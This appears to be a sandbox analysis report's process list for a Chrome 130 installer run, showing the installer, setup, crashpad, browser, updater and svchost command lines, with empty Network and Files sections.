
C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\27c53165-5483-48e1-8169-09d4bb877bd0.tmp"

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --install-archive="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\27c53165-5483-48e1-8169-09d4bb877bd0.tmp"

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff60a6fec28,0x7ff60a6fec34,0x7ff60a6fec40

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff60a6fec28,0x7ff60a6fec34,0x7ff60a6fec40

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc1db7c38,0x7fffc1db7c44,0x7fffc1db7c50

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=1960 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2092,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2352,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2920,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2932,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3860,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4700,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5416,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5432,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5600,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5696,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:2

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

Network

Files
